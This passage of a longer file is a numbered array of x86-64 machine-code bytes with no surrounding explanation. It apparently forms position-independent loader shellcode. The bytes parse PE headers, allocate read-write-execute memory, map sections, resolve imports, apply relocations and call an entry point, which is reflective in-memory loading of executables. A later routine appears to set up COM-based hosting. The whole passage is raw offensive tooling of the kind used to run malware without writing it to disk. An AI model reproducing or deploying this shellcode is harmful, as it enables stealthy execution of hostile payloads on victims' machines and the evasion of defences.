469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
